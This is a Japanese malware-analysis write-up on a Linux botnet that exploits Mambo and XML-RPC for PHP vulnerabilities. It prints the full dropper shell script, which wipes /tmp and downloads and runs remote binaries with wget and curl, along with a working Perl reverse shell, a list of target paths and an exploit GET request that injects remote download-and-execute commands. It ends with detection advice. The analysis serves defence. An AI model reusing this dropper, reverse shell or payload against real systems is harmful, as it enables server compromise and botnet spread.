昨年からLinuxをターゲットとしたボットネットが確認されている。このボットネットは、主にPHPの脆弱性を利用して、ターゲットにコマンドを実行させる。今回は、ボットネットの攻撃の挙動について説明する。
①ターゲットへの攻撃
「Mambo」や「XML-RPC for PHP」の脆弱性を利用した攻撃が行われる。
②攻撃が成功した場合は、以下のperlスクリプトが実行される。
#!/bin/bash
cd /tmp
rm -rf *
rm -rf .*
mkdir .sess_a4c1cb9ea15105441fb0366b06479082
cd .sess_a4c1cb9ea15105441fb0366b06479082
if [ -f cb ]; then
chmod +x cb
./cb ***.31.193.67 8080 &
else
wget ***.222.141.147/studio/images/logo.jpg
mv logo.jpg cb
chmod +x cb
./cb ***.31.193.67 8080 &
fi
if [ -f ping.txt ]; then
perl ping.txt ***.245.233.251 8080 &
else
curl -o ping.txt 81.58.26.26/libsh/ping.txt
perl ping.txt ***.31.193.67 8080 &
fi
if [ -f crond ]; then
rm -rf /tmp/chspsp*
chmod +x crond
export PATH="."
crond
else
wget ***.77.126.41/images/crond
chmod +x crond
export PATH="."
crond
fi
if [ -f crond ]; then
chmod +x crond
export PATH="."
crond
else
curl -o crond ***.77.126.41/images/crond
chmod +x crond
export PATH="."
crond
・スクリプトのダウロードサイト
| [http://] ***.24.84.10/chspsp ダウロード可能 [http://] ***.84.105.36/supine ダウロード不可 [http://] ***.170.105.69/supina ダウロード不可 [http://] ***.123.16.34/giculo ダウロード不可 [http://] ***.123.16.34/gicumz ダウロード不可 [http://] ***.97.113.25/giculz ダウロード不可 |
・ping.txt
上記スクリプトが実行され、ping.txtというスクリプトがダウロードされる。
このスクリプトは、任意のIPアドレスに対して接続を行う。
#!/usr/bin/perl
use Socket;
use FileHandle;
$IP = $ARGV[0];
$PORT = $ARGV[1];
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("id;pwd;uname -a;w;HISTFILE=/dev/null /bin/sh -i");
・cb
上記スクリプトが実行され、cbというツールがダウロードされる。
このスクリプトは、任意のIPアドレスに対して5秒間隔で接続を試みる。
サーバー側で接続セッション数を制限しているものと思われる。
今回は接続が確立された後、SSHのパッケージがダウロードされ、
インストールされた事を確認する。
[root@RedHat7 .sess_a4c1cb9ea15105441fb0366b06479082]# ./cb ***.31.193.67 8080 &[1] 2088
socket ok
error: Connection refused
retring in 5 seconds
socket ok
error: Connection refused
retring in 5 seconds
socket ok
error: Connection refused
retring in 5 seconds
socket ok
error: Connection refused
retring in 5 seconds
socket ok
error: Connection refused
retring in 5 seconds
・crond
上記スクリプトが実行され、crondというツールがダウロードされる。
このツールは、PHPの攻撃コードが含まれている。
実行後、近接IPアドレスに対してPHPの攻撃を開始する。
crondツール解析した結果について説明する。
1)通知メッセージを、UDP ポート 25555 を介して2箇所のリモート IP アドレスへ送信を行う。
***.223.104.152
***.224.174.18
2)以下のパスが生成され、攻撃対象としている。
/cvs/
/articles/mambo/
/cvs/mambo/
/blog/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogs/xmlsrv
/xmlrpc.php
/drupal/xmlrpc.php
/phpgroupware/xmlrpc.php
/wordpress/xmlrpc.php
/xmlrpc/xmlrpc.php
3)攻撃はGetおよびPostコマンドによって実行されている。
| GET %sindex2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS =&mosConfig_absolute_path=http://***.24.84.10/heade.gif?&cmd =cd%%20/tmp;wget%%20***.24.84.10/chspsp;chmod%%20744%%20chspsp;./chspsp;echo%%20YYY;echo| HTTP/1.1\nHost: %s\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)\n\n |
Postコマンド
| POST /xmlsrv/xmlrpc.php HTTP/1.1 Host: ***.**.***.*** User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) Content-Type: text/xml Content-Length:269 <?xml version="1.0"?><methodCall><methodName>test.method</methodName> |
見方法
攻撃が成功した場合、インターネットへの接続が遅くなります。このような現象を感じた場合は、サーバの/tmpフォルダの下に不明ファイルが存在しないか確認を行います。または、以下のようなプロセスが起動していないか確認を行い、発見した場合は、直ちにプロセスを止め、ファイルを削除することをお勧めします。
| root 1189 1090 0 08:54 pts/1 00:00:00 ./cb ***.31.193.67 8080 |
参照情報
http://www.isskk.co.jp/SOC_report.html
http://www.symantec.com/region/jp/avcenter/venc/data/jp-linux.plupii.html
http://www.symantec.co.jp/region/jp/avcenter/venc/data/jp-linux.plupii.a.html
http://www.symantec.co.jp/region/jp/avcenter/venc/data/jp-linux.plupii.b.html
http://www.symantec.co.jp/region/jp/avcenter/venc/data/jp-linux.plupii.c.html